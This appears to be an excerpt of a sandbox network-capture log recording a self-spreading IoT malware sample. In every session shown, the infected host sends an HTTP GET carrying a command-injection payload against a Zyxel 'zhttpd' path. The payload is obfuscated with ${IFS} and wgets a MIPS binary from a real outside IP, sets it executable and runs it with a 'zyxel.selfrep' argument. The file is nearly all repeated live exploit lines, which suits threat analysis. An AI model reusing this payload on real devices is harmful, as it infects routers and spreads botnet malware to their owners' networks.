                                    Jan 13, 2024 19:02:22.909028053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1576192.168.2.1345426206.31.74.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909077883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1577192.168.2.1340868158.87.228.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909120083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1578192.168.2.1345242115.109.75.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909173012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1579192.168.2.135229489.92.190.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909218073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1580192.168.2.133574085.127.42.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909276009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1581192.168.2.1348390143.110.98.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909337044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1582192.168.2.1354966110.223.195.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909400940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1583192.168.2.1352214193.210.53.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909463882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1584192.168.2.1349718193.171.51.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909521103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1585192.168.2.1336092108.34.55.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909563065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1586192.168.2.133917650.1.165.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909629107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1587192.168.2.135830219.69.20.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909677029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1588192.168.2.133707681.145.15.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909729958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1589192.168.2.1352458219.115.114.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909778118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1590192.168.2.1351580132.127.188.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909831047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1591192.168.2.1350676219.252.20.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909950972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1592192.168.2.1360038136.185.162.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909965992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1593192.168.2.1357260180.161.40.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.909997940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1594192.168.2.1341920132.177.247.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910038948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1595192.168.2.1347634212.204.197.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910099030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1596192.168.2.1345042130.131.1.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910156012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1597192.168.2.1341996172.103.148.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910201073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1598192.168.2.1350988131.188.36.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910245895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1599192.168.2.13343268.159.37.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910325050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1600192.168.2.1348448197.184.233.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910386086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1601192.168.2.1352178141.62.56.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910422087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1602192.168.2.1338242142.162.178.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910456896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1603192.168.2.1341692142.147.52.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910512924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1604192.168.2.135792241.33.207.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910543919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1605192.168.2.133585218.84.67.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910576105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1606192.168.2.1352832145.230.215.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910612106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1607192.168.2.134279053.132.117.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910669088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1608192.168.2.134930089.85.15.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910708904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1609192.168.2.133552840.143.192.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910790920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1610192.168.2.1358500143.202.177.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910851955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1611192.168.2.1344968154.249.22.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910876036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1612192.168.2.1354746119.186.115.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.910965919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1613192.168.2.1356942142.180.1.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911004066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1614192.168.2.1340936198.203.10.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911051035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1615192.168.2.134642697.78.24.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911114931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1616192.168.2.135802887.124.159.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911173105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1617192.168.2.1339822144.138.13.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911223888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1618192.168.2.134505454.201.26.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911258936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1619192.168.2.1354440108.111.165.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911310911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1620192.168.2.1333694197.150.169.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911390066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1621192.168.2.1333700161.164.86.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911422968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1622192.168.2.135768836.78.147.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911478043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1623192.168.2.1345978128.61.72.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911511898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1624192.168.2.1338978163.61.220.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911587954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1625192.168.2.135035268.229.50.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911649942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1626192.168.2.135595080.62.218.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911690950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1627192.168.2.1355702192.19.39.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911761045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1628192.168.2.134395240.243.148.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911813021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1629192.168.2.1338030192.127.80.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911849976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1630192.168.2.136089283.133.188.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911938906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1631192.168.2.1356346178.133.234.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.911987066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1632192.168.2.1345002182.63.148.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912043095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1633192.168.2.1360936174.88.227.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912120104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1634192.168.2.1360636204.85.83.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912127972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1635192.168.2.1336384167.184.66.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912174940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1636192.168.2.135582017.249.137.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912250042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1637192.168.2.13548389.143.249.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912307024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1638192.168.2.13537125.9.164.144443
                                    TimestampBytes transferredDirectionData
